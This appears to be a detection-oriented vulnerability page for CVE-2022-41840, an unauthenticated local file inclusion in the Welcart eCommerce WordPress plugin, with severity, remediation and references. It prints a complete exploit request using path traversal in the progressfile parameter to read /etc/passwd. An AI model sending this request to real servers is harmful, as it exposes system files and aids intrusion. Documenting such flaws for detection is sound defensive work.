🔙 목록으로 돌아가기

CVE-2022-41840: Welcart eCommerce <=2.7.7 - Local File Inclusion

TitleWelcart eCommerce <=2.7.7 - Local File Inclusion
Authortheamanrawat
SeverityCritical
ImpactThe LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
RemediationUpgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability.
CVSS Score9.8
EPSS Score0.71978
CVE IDCVE-2022-41840
CWE IDCWE-22
Tags cve2022 cve wp-plugin wordpress wp lfi unauth usc-e-shop collne vkev vuln

🔍 Vulnerability Description

Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.

🌐 HTTP Request

GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-41840.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-41840.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A